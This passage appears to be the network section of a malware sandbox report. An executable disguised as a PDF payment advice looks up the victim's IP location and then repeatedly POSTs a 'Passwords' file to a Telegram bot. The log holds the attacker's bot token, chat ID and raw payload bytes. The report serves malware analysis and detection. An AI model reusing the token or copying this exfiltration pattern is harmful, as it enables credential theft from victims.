                                                                                                                                  Data Ascii: /G1))ntjaH>GQQ$x]u^Us"tgf{gS=,{J#+)kHKJd`}&UKm}yk">Oy"e]%S~2L|k@-dBi'=^0WGCqQDT_goF u
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: 65 02 a3 5d 1d 0d 43 bb 27 40 a5 c5 e2 38 50 56 a1 24 1c 83 e7 63 ae 3f f4 f0 22 45 ec d7 d5 56 85 ec 2a 9d 8f c6 a7 74 0a ec d5 d7 d0 e9 6a 01 3f a5 11 84 ec a7 0c ec aa 63 55 70 14 9e 80 89 ee 90 b9 aa c6 2f 05 fe c4 67 05 42 e3 12 6d 9d 3a 45 74 78 68 34 64 05 73 f8 3e 6a 1d fa ea cc fb 21 df e3 4b 9e 86 cd e4 dd 6f 1c 4e ee 45 65 7e 53 ec fa 8a 3d 81 ea 84 2d ea 2c 30 31 eb e7 1f 02 dc d4 3f 65 0f ca 71 b5 21 aa 66 7f f2 5e 44 1f 32 6d 84 5a f2 34 79 f0 87 74 aa 65 96 5d ec 0a 64 5f 3a 22 3b f4 73 67 9f a4 82 10 9c 73 41 89 e7 7d 2c 12 4f b8 65 01 ba a1 10 e7 3b 73 90 b7 37 9e c2 ec 90 ee d7 89 6a 00 42 fb a5 e8 c7 aa 61 5b c0 f5 36 83 d1 94 2e 8f 74 f6 2b 23 a7 50 f6 ae 22 db a1 65 3f b6 57 b8 01 46 4f df bf 7d 68 f2 20 36 63 84 fe 5f 5d 62 37 95 a2
                                                                                                                                  Data Ascii: e]C'@8PV$c?"EV*tj?cUp/gBm:Etxh4ds>j!KoNEe~S=-,01?eq!f^D2mZ4yte]d_:";sgsA},Oe;s7jBa[6.t+#P"e?WFO}h 6c_]b7
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: 95 06 fd d0 94 e0 24 51 70 48 81 dc 5b 2e 40 fc 2c c7 50 93 83 f8 e0 92 6d cd 0f 75 69 24 c7 b1 1f a8 fb 28 44 a8 88 4b 6a fd c8 53 4e 09 d0 52 44 b6 ec a5 02 5d 90 66 f6 ae d0 f1 d2 55 f3 f4 f1 e4 3e 7c 99 2c c4 e7 ee 6f 65 c8 20 7e 7e 6a 84 6f 98 14 38 34 12 89 b5 8b e7 8e a3 37 81 56 29 ae b5 0d 0b 07 9a 7d 96 40 47 ab 06 34 37 c5 b4 90 28 d4 b5 6d 45 ed 74 fd f6 d2 cc 6b 84 3d 05 db ff 2e b6 7d 6c 65 81 3b 26 7d 87 61 8f 15 70 cf 1a 31 69 b4 1d b7 80 fe 2f 74 3f 38 95 14 8d b0 93 21 9c 69 94 45 71 f5 7c 71 52 ba 54 25 1e b2 2a d5 cf 9f 4c 0c 66 91 71 e7 a4 73 36 bf 99 47 82 af 00 fc 0c 69 a3 0f 50 25 e1 53 50 06 7e 83 fc 65 03 75 87 bf 6a e7 4d 5a 86 31 6b 8a 5f 05 ac 6f 7e 35 9d 1f 85 8c 0a a3 e3 33 e2 76 2d ec 87 17 5d ca 76 09 1f 4e b6 d1 b0 9e dd
                                                                                                                                  Data Ascii: $QpH[.@,Pmui$(DKjSNRD]fU>|,oe ~~jo847V)}@G47(mEtk=.}le;&}ap1i/t?8!iEq|qRT%*Lfqs6GiP%SP~eujMZ1k_o~53v-]vN
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: 41 1e 90 5a 4e 6a 97 be ce 48 8d c8 9e 07 9d c0 30 4a 52 7b 34 db 92 58 fe 1b dd 8c ff 0b 7c f9 50 12 10 b2 e4 fa 96 89 e8 b2 80 4e 3e fe 1c 69 a1 02 a2 db c8 76 bc 2f 63 c8 bf d9 b7 37 c6 9b 7e 93 e1 4a 5d c9 f9 f8 18 74 0a 87 b7 2c 93 73 44 7b 7e 7f 53 0e c5 f6 d3 e8 e4 b4 8b d1 7d a9 d4 30 c1 98 79 71 4e e1 6c d2 d9 18 64 db c9 8a e7 26 29 88 4b c0 62 67 3a d0 30 e1 a8 cc 39 da 5a d0 b4 05 a5 3e 71 6b 6e 34 4a 1e 94 bd a6 4d 3b 48 38 96 ba 9e 92 1d ab 8c ab 56 94 7f f5 1a 86 30 25 38 08 29 07 1c 47 83 cc ea 3e 95 d4 3f aa e7 e7 6b b3 99 67 9e 3a 9e 2e ce f9 6a 80 62 db 65 c3 9e b2 6f ef a9 b1 5b c5 ea 46 8d e0 34 92 a8 4a fa 47 06 80 26 17 ae bd 5d ff 12 a9 88 44 4f 10 43 68 a8 a2 b2 b0 b3 44 f3 f1 7e 06 8d 76 d3 6c fc ee e5 e8 d0 a5 d9 0d 6b d2 73 ca
                                                                                                                                  Data Ascii: AZNjH0JR{4X|PN>iv/c7~J]t,sD{~S}0yqNld&)Kbg:09Z>qkn4JM;H8V0%8)G>?kg:.jbeo[F4JG&]DOChD~vlks
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: b2 71 42 4e a0 89 1e ab c5 39 69 c9 82 27 08 9a 71 1b 87 c2 ef 25 ad 7f f2 ad ef 87 d7 dc 34 ce b6 07 ac d1 96 99 38 eb 6a 01 4a c4 f3 fa de 80 c9 e9 7f 37 22 de 0b 40 64 2d ac 19 8c 88 2b 10 51 12 b6 58 27 6a 21 51 01 4f 74 ea 66 7a 45 f2 df f4 53 ac 26 cf 65 c6 c4 19 af 6b 6a e0 4e 31 a0 79 b9 3b bb 5f 5e cd 43 cb 83 76 b8 c4 9c fb 22 ca bb 86 49 f6 40 25 bb 39 97 57 16 5b cd 2b 13 56 83 f9 80 a9 9b 98 84 67 22 9f 76 ff 7a 86 6e 0a 2c ab 00 8e ed a7 02 d5 3a 4b 1b 76 07 9d 11 8f fa 6e bc b9 de 3c 27 35 3a 66 1c 5a f7 08 44 a6 83 31 7b 6a 60 db 77 66 2c f8 25 0f 0d f3 c2 53 fb fd d9 db 4c 9e 86 e7 ce ed 6f 34 e6 ee 58 6f 0c d5 eb 87 16 21 81 9a f0 c8 e0 2c 7c 5d b4 e7 33 08 f4 79 3f 16 d0 d9 74 bf 3b b4 99 a2 f7 5e 35 2c 0c 9e 4e 4f f8 52 25 d6 81 03 3e
                                                                                                                                  Data Ascii: qBN9i'q%48jJ7"@d-+QX'j!QOtfzES&ekjN1y;_^Cv"I@%9W[+Vg"vzn,:Kvn<'5:fZD1{j`wf,%SLo4Xo!,|]3y?t;^5,NOR%>
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: 28 3b a6 33 d9 ff c2 2e 9e 24 d6 de 4c 20 d1 1c 58 7b e3 fb 37 63 84 a4 5c 45 62 41 e9 74 e9 2f 98 2e 76 d4 33 52 28 67 de 87 81 f6 98 7f 93 11 0f 5d 27 1b 84 e0 01 d3 36 b4 de 2f d0 b7 af 01 24 ef d8 b0 95 a0 87 7e c0 57 bb e2 f0 1c fb 84 f4 73 27 58 87 9b 6b 02 5a 03 e1 16 2d 6b 7d d1 90 56 54 b8 fd d0 83 ff 30 5c fb 5f fd 2f 50 5d de ea 04 4c 43 9c 98 e0 0f 9f 0e 98 67 97 1c 4b 5c a7 37 23 ec fe 21 51 76 48 3f fd d4 53 4c 57 c9 55 c9 f9 c4 eb 03 78 8c 07 01 ab c1 98 03 80 e4 fd 59 d2 34 1f a7 56 35 97 4c 40 cb ca 37 cd 48 67 2c 3e 5b 99 11 96 37 93 b7 9a 53 b8 aa 37 4d 73 29 ae 04 33 ba 15 8b 63 93 5c 2a cb f4 34 33 de 9f a9 72 c2 24 47 15 e2 74 fd 0c d3 df 6d 92 3d c0 d1 e9 26 9d 6a 7c 48 79 c5 f2 87 87 76 42 1d 55 f6 3a 26 b3 ad 14 af 93 cd 45 42 3d
                                                                                                                                  Data Ascii: (;3.$L X{7c\EbAt/.v3R(g]'6/$~Ws'XkZ-k}VT0\_/P]LCgK\7#!QvH?SLWUxY4V5L@7Hg,>[7S7Ms)3c\*43r$Gtm=&j|HyvBU:&EB=
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: 28 69 1f 68 17 34 51 85 86 16 4e f6 1e 13 7f 3c 90 b8 7a 51 51 3b 8b 05 4f e3 a8 31 78 c9 fa b3 4b ab 0b 18 65 77 1b d9 29 5b 6e 58 0a d3 9a 4a 91 97 eb 69 8e 66 7e 7d 1e 7c 11 2d 8b f2 47 93 65 2b 9f c3 95 0d 7d 2c 9e f2 0d 16 5a d4 14 46 d6 38 db 52 d7 14 5c ca 2b 1b be 27 6b c7 55 8b 9e 00 50 03 6d 49 4f 51 90 af d3 46 6b 36 73 f9 9d c0 df 5a 77 42 07 d9 e0 9a f6 15 ad 8c e3 0b 7c f9 85 04 9d c1 a5 e6 97 85 ef 9a 78 4e 2d f4 0a 97 f7 0e ab c8 a7 66 b9 03 7a dc ac dd f3 0f 1b 9a 65 a3 e5 38 c3 d3 f9 88 35 07 f3 96 b7 39 88 73 66 7b 7e 7f 09 c6 e6 f6 a9 d3 ac a5 8d b4 8b a9 d2 12 2a 90 52 38 54 ee 3a ea d8 18 6e f5 80 5d e7 2c 3c 8d 52 bb 4c e6 3a a0 5e 20 a2 dd 35 93 af bf 67 0f b6 33 77 ba 6e 3e 4d 01 bf 9c a0 46 54 b6 30 87 b7 fb 95 fe ab fc ce ec 94
                                                                                                                                  Data Ascii: (ih4QN<zQQ;O1xKew)[nXJif~}|-Ge+},ZF8R\+'kUPmIOQFk6sZwB|xN-fze859sf{~*R8T:n],<RL:^ 5g3wn>MFT0
                                                                                                                                  2024-12-17 07:43:02 UTC1390INData Raw: 80 17 55 4a 67 d7 a9 6a 9b 22 f3 f1 67 06 8d 67 83 79 ea c6 68 e9 d0 af da 09 b5 f2 12 e2 66 70 11 3c 9b b2 0a b7 ba dc 9c 28 b8 13 3d 83 9b fb c0 2c cb 71 a0 d3 04 cc fa 2c 65 a4 57 4e 82 18 67 04 e4 17 4b 4a 64 af 4a 97 12 8a 95 00 bf d1 d3 26 53 e6 9c ea 37 17 77 65 16 c0 69 ca cd 8f ce a7 65 71 3e 49 b7 53 3e ad d3 3b 6e ee 89 0e d0 9a 79 00 f2 90 9a 39 dd 27 d3 78 ef 8d db d1 3a f7 49 75 d2 c7 9d ee 6e 78 6b 01 4c d1 84 25 cf 87 bd 79 6b 45 08 ad de 30 0b f9 bf 1c 9b ab 0b ec 82 12 b0 4d 38 a1 3a 7b 54 5a 5b d1 70 7b 4f 9d d3 e4 54 d4 21 d6 64 b6 a1 e4 3b 6b 6c eb 55 29 b6 02 d3 d9 ba 3c 3b 09 49 dd 7b 64 af c7 9c f7 7c 40 8f 2c 39 99 9f 34 be 50 db 52 07 54 f4 b1 3b c3 85 ea 8e ab 96 b4 c7 61 21 bc 77 d7 da e9 6a 01 24 b0 68 f9 70 bb 08 8d c1 9e 1b
                                                                                                                                  Data Ascii: UJgj"ggyhfp<(=,q,eWNgKJdJ&S7weieq>IS>;ny9'x:IunxkL%ykE0M8:{TZ[p{OT!d;klU)<;I{d|@,94PRT;a!wj$hp


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.449739104.21.67.1524437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:07 UTC882INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:07 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 410156
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccouM%2FZ%2F9FEnTbTIQ4qeTzB2UIoCL7fwUWdVUlp%2F626SZO1MQyHFimae3SRuBCeQSp%2BaC%2BSUOhBHXQbfDXtFHWLgplDyGKLRrFyYozJQPTqwLYD4r9q8RHb51meyTS%2BDr7JhfbNE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f3547c88995425b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1584&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1789215&cwnd=238&unsent_bytes=0&cid=501481dbbfa4d3de&ts=455&x=0"
                                                                                                                                  2024-12-17 07:43:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.449747149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:15 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1e448cf4571d
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 34 34 38 63 66 34 35 37 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1e448cf4571dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:15 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:15 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:15 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 33 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13686,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421395,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.449759149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:18 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1e7283a76d25
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:18 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 37 32 38 33 61 37 36 64 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1e7283a76d25Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:19 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:19 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:19 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 33 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13687,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421399,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.449766149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:22 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1e9d6fdd08c3
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-17 07:43:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 39 64 36 66 64 64 30 38 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1e9d6fdd08c3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:22 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:22 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:22 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13688,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421402,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.449778149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:25 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1ec81d1bdcb8
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-17 07:43:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 63 38 31 64 31 62 64 63 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1ec81d1bdcb8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:26 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:25 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
